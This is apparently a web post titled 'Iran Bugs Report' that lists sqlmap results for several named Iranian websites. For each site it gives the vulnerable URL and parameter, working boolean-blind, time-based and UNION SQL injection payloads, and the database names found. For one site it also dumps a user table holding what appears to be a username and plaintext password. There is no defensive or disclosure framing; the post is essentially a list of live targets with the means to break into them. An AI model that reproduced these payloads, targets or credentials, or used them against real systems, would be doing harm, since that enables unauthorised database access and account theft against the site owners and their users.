Iran Bugs Report

http://v-mahdieh.ir/news.php?id=5
=================================
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=5′ AND 8709=8709 AND ‘QAPq’=’QAPq

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=5’ AND SLEEP(5) AND ‘bFTK’=’bFTK

Type: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=-3909’ UNION ALL SELECT NULL,CONCAT(0x7176707871,0x7848655262786b57746a5379746175515a76574e5174504a4c565a635157796c64484d775a497573,0x7171707a71),NULL,NULL– yDYg

[11:39:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

available databases [2]:
[*] information_schema
[*] vmahdieh_mhddb


Table: user
[1 entry]
+———-+———+
| user | pass |
+———-+———+
| 22552255 | 2Kt9ndQ |
+———-+———+


Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=14 AND 7623=7623

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=14 AND SLEEP(5)

[11:32:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
http://www.topemc.ir/news.php?id=14


https://mosafer24.ir
================
Parameter: idhotel (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: irantech_parvaz=iranhoteldetail&idhotel=31′ AND 3848=3848 AND ‘mrZu’=’mrZu&idcity=80&level22=15

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: irantech_parvaz=iranhoteldetail&idhotel=31’ AND SLEEP(5) AND ‘FWTA’=’FWTA&idcity=80&level22=15

[11:06:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] daryagasht_nilfa
[*] information_schema


http://tccim.ir/deputation_info.aspx?id=98

sqlmap identified the following injection point(s) with a total of 4385 HTTP(s) requests:

Parameter: id (GET)
Type: boolean-based blind
Title: Microsoft Access boolean-based blind – Parameter replace
Payload: id=IIF(7404=7404,7404,1/0)

back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: Microsoft Access boolean-based blind – Parameter replace
Payload: id=IIF(7404=7404,7404,1/0)

Categories: